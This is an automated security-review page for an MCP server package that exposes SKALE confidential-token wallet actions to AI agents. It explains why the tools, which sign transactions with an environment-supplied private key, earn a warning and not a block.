AI Security Review
scanned 6h ago · by lpm-firewall-aiThe package is a user-invoked MCP server for SKALE confidential token operations. It exposes high-impact wallet actions to any configured MCP-compatible agent but does not install itself or mutate foreign agent configuration.
Static reason
High-risk behavior combination matched malicious policy.
Trigger
Running privacy-mcp directly or via an MCP client, then invoking registered tools
Impact
An authorized or compromised agent session could move or unwrap configured wallet assets through exposed tools.
Mechanism
MCP wallet transaction tools using env-provided private key
Attack narrative
At runtime, the CLI starts a stdio MCP server. Its tools read SKALE_RPC_URL, SKALE_PRIVATE_KEY/PRIVATE_KEY, and wrapper addresses from environment variables, construct a viem wallet client, and call SKALE privacy SDK methods including transfer, wrap, unwrap, balance decryption, and transfer reveal. This is documented package functionality rather than hidden install-time behavior, but it is a dangerous agent-facing capability if connected to an agent with broad autonomy.
Rationale
Source inspection shows no lifecycle hijack, persistence, exfiltration, or hidden code execution; the risky crypto actions are explicit MCP tools aligned with the package description. Because those tools can move funds when invoked by an AI agent, warn rather than block.
Evidence
package.jsondist/index.jsdist/bin.jsREADME.md
Decision evidence
public snapshotAI called this Suspicious at 90.0% confidence as Dangerous Capability with low false-positive risk.
Evidence for block
- dist/index.js registers MCP tools that can transfer, wrap, and unwrap tokens using configured private key
- dist/bin.js starts an MCP stdio server exposing those tools to AI clients
- dist/index.js reads SKALE_PRIVATE_KEY/PRIVATE_KEY and sends transactions via viem walletClient
- README.md documents AI clients invoking send_private_payment and MCP config with private key env vars
Evidence against
- package.json has no install/preinstall/postinstall lifecycle hooks
- No code writes MCP/Claude/Cursor config or other agent control-surface files
- No child_process, eval/vm/Function, filesystem writes, or native/binary loading found
- Network use is via user-supplied SKALE_RPC_URL for package-aligned blockchain RPC operations
- No hardcoded exfiltration endpoint or secret logging/returning observed
Behavioral surface
EnvironmentVars
HighEntropyStrings
NoLicense
Source & flagged code
2 flagged · loading sourcedist/bin.jsView file
14import { createWalletClient, http } from "viem";
L15: import { privateKeyToAccount } from "viem/accounts";
L16: function getConfigFromEnv() {
L17: const rpcUrl = process.env.SKALE_RPC_URL;
L18: const privateKey = process.env.SKALE_PRIVATE_KEY ?? process.env.PRIVATE_KEY;
L19: const wrapperAddress = process.env.SKALE_WRAPPER_ADDRESS ?? process.env.WRAPPER_ADDRESS;
Critical
Wallet Drain
Source uses private key material to transfer cryptocurrency funds.
dist/bin.jsView on unpkg · L14dist/index.jsView file
9Trigger-reachable chain: manifest.main -> dist/index.js
L9: import { createWalletClient, http } from "viem";
L10: import { privateKeyToAccount } from "viem/accounts";
L11: function getConfigFromEnv() {
L12: const rpcUrl = process.env.SKALE_RPC_URL;
L13: const privateKey = process.env.SKALE_PRIVATE_KEY ?? process.env.PRIVATE_KEY;
L14: const wrapperAddress = process.env.SKALE_WRAPPER_ADDRESS ?? process.env.WRAPPER_ADDRESS;
Critical
Trigger Reachable Dangerous Capability
A package entrypoint or install-time lifecycle script reaches a source file with blocking dangerous behavior.
dist/index.jsView on unpkg · L9Findings
2 Critical2 Medium3 Low
CriticalWallet Draindist/bin.js
CriticalTrigger Reachable Dangerous Capabilitydist/index.js
MediumEnvironment Vars
MediumStructural Risk Force Deep Review
LowScripts Present
LowHigh Entropy Strings
LowNo License